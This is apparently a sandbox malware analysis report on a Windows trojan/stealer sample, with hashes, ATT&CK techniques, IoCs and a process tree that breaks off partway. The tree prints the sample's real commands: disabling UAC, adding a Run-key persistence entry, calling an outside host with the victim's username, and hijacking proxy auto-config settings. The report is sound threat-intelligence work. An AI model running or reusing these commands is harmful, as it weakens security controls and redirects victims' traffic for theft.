c1af1475b4f135113ffe1391d77b334c4b3fee633d321de17670f3f8c6751e61

Analysis

max time kernel
121s
max time network
128s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15-09-2024 09:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe
Size

24KB
MD5

e22d161ec74fd881a38bbaa560549f8d
SHA1

ea893f72e3abbf1df11924b7702283cc3e7afeac
SHA256

c1af1475b4f135113ffe1391d77b334c4b3fee633d321de17670f3f8c6751e61
SHA512

d427cb7a6f3a61ce167737865c7cbe1baa66f21fcd7db3008a703d34e72c8bcad3605e483d31ed06dc471c84f970dca7b628351091e4f43e2c0aa7c46eefb0ed
SSDEEP

384:+r9sOcIp6wRcsSYLvKWLWbstQTid6HJyraXkqdkJ7PNWoLQd6FqeZUfaNJawcudv:OmOhplcsHvKWzX6HJmFqda7koLL7Lnb

Score

10^/10

discovery evasion persistence spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2724-1-0x0000000000400000-0x0000000000417000-memory.dmp	upx
behavioral1/memory/2724-177-0x0000000000400000-0x0000000000417000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ActiveX Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\AxUpdateMS.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2632	PING.EXE
2240	cmd.exe
2108	PING.EXE

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10b2d41e5207db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4A4091D1-7345-11EF-9AD1-5A77BF4D32F0} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f035510000000002000000000010660000000100002000000023aab02ab8a92192bed3b2cc7187c0c6e7839336b15758bfd980f125de4ecb45000000000e8000000002000020000000f5d71c215215fcd7fad3f3bda474d457fb7cf2699f75478da960b702be1c806920000000ccbcb09d3b8fdcccf513ea7c789bb04e1877e86bef7980b47782deb4907ece4840000000e5af8f385813cd1b6b63d0cd8903ca2c28508e2c67db0a495bea5aab36785c176639d05a1b069d7fc51b0b499c1e90b18bebee6e394080ef812c64f6f23ba6eb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432554558"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f035510000000002000000000010660000000100002000000080fc1b0398a452bede3955b4f73159b071849248c10b4a971bde1979629ad1f8000000000e8000000002000020000000a586ae3cb3b94d28487bc7076d738693b678bd63ba09e8f74f10eefd0a5f16679000000097a8cbc928b45fa598818783399439059a3dc45485faebb9d1639fa97fb0638224e956b0a9e5913d407cbbc5b1a26fc422d3bee1a504d963fa1641f011c42dd071ad726d87cf6a2422113ec7c1fec73a735191b07b45bf3e5ecf2f5799ed0cbf6e52ccdf6373ed5cfd64e2847e3fe69600a4e79b409e19e6226f071d32a11a5ec6b3513feeee7bf46ce32a2c1871aa7e4000000098792b1d7c0e0fb61fa33fe4ceb3d4706cc7cb556bcf43be06d149edfac6bfc82288b2d0f1403340bca21a06f6e7049b9bfc00c87eab115741cf04b23b594494	iexplore.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2632	PING.EXE
2108	PING.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2820	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2820	iexplore.exe
2820	iexplore.exe
2476	IEXPLORE.EXE
2476	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 2736	2724	e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe	30
PID 2724 wrote to memory of 2736	2724	e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe	30
PID 2724 wrote to memory of 2736	2724	e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe	30
PID 2724 wrote to memory of 2736	2724	e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe	30
PID 2736 wrote to memory of 2316	2736	cmd.exe	32
PID 2736 wrote to memory of 2316	2736	cmd.exe	32
PID 2736 wrote to memory of 2316	2736	cmd.exe	32
PID 2736 wrote to memory of 2316	2736	cmd.exe	32
PID 2736 wrote to memory of 2860	2736	cmd.exe	33
PID 2736 wrote to memory of 2860	2736	cmd.exe	33
PID 2736 wrote to memory of 2860	2736	cmd.exe	33
PID 2736 wrote to memory of 2860	2736	cmd.exe	33
PID 2736 wrote to memory of 2820	2736	cmd.exe	34
PID 2736 wrote to memory of 2820	2736	cmd.exe	34
PID 2736 wrote to memory of 2820	2736	cmd.exe	34
PID 2736 wrote to memory of 2820	2736	cmd.exe	34
PID 2736 wrote to memory of 2632	2736	cmd.exe	35
PID 2736 wrote to memory of 2632	2736	cmd.exe	35
PID 2736 wrote to memory of 2632	2736	cmd.exe	35
PID 2736 wrote to memory of 2632	2736	cmd.exe	35
PID 2736 wrote to memory of 2592	2736	cmd.exe	36
PID 2736 wrote to memory of 2592	2736	cmd.exe	36
PID 2736 wrote to memory of 2592	2736	cmd.exe	36
PID 2736 wrote to memory of 2592	2736	cmd.exe	36
PID 2820 wrote to memory of 2476	2820	iexplore.exe	37
PID 2820 wrote to memory of 2476	2820	iexplore.exe	37
PID 2820 wrote to memory of 2476	2820	iexplore.exe	37
PID 2820 wrote to memory of 2476	2820	iexplore.exe	37
PID 2736 wrote to memory of 2240	2736	cmd.exe	38
PID 2736 wrote to memory of 2240	2736	cmd.exe	38
PID 2736 wrote to memory of 2240	2736	cmd.exe	38
PID 2736 wrote to memory of 2240	2736	cmd.exe	38
PID 2240 wrote to memory of 2108	2240	cmd.exe	39
PID 2240 wrote to memory of 2108	2240	cmd.exe	39
PID 2240 wrote to memory of 2108	2240	cmd.exe	39
PID 2240 wrote to memory of 2108	2240	cmd.exe	39
PID 2240 wrote to memory of 2072	2240	cmd.exe	40
PID 2240 wrote to memory of 2072	2240	cmd.exe	40
PID 2240 wrote to memory of 2072	2240	cmd.exe	40
PID 2240 wrote to memory of 2072	2240	cmd.exe	40
PID 2736 wrote to memory of 696	2736	cmd.exe	41
PID 2736 wrote to memory of 696	2736	cmd.exe	41
PID 2736 wrote to memory of 696	2736	cmd.exe	41
PID 2736 wrote to memory of 696	2736	cmd.exe	41
PID 2736 wrote to memory of 1484	2736	cmd.exe	42
PID 2736 wrote to memory of 1484	2736	cmd.exe	42
PID 2736 wrote to memory of 1484	2736	cmd.exe	42
PID 2736 wrote to memory of 1484	2736	cmd.exe	42
PID 2736 wrote to memory of 2560	2736	cmd.exe	43
PID 2736 wrote to memory of 2560	2736	cmd.exe	43
PID 2736 wrote to memory of 2560	2736	cmd.exe	43
PID 2736 wrote to memory of 2560	2736	cmd.exe	43
PID 2736 wrote to memory of 800	2736	cmd.exe	44
PID 2736 wrote to memory of 800	2736	cmd.exe	44
PID 2736 wrote to memory of 800	2736	cmd.exe	44
PID 2736 wrote to memory of 800	2736	cmd.exe	44
PID 2736 wrote to memory of 1032	2736	cmd.exe	45
PID 2736 wrote to memory of 1032	2736	cmd.exe	45
PID 2736 wrote to memory of 1032	2736	cmd.exe	45
PID 2736 wrote to memory of 1032	2736	cmd.exe	45
PID 2736 wrote to memory of 2036	2736	cmd.exe	46
PID 2736 wrote to memory of 2036	2736	cmd.exe	46
PID 2736 wrote to memory of 2036	2736	cmd.exe	46
PID 2736 wrote to memory of 2036	2736	cmd.exe	46

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
292	attrib.exe
2516	attrib.exe
2532	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e22d161ec74fd881a38bbaa560549f8d_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7D6A.tmp\windowsCrash.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2316
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "ActiveX Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\AxUpdateMS.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2860
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "http://www.sivellongrupp.ee/google.php?a=Admin&b=ELZYPTFV"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2820 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2476
- - C:\Windows\SysWOW64\PING.EXE
    C:\Windows\system32\ping.exe www.google.com.br -n 1 -l 1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2632
- - C:\Windows\SysWOW64\find.exe
    find "TTL"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\system32\ping.exe me.firepackets.org -l 1 -n 1 | C:\Windows\system32\find.exe "TTL"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\SysWOW64\PING.EXE
      C:\Windows\system32\ping.exe me.firepackets.org -l 1 -n 1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2108
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "TTL"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:696
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_ELZYPTFV.txt" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2560
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1032
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:832
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2192
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1136
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_ELZYPTFV.txt" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1992
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1692
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:888
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:632
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2952
- - C:\Windows\SysWOW64\reg.exe
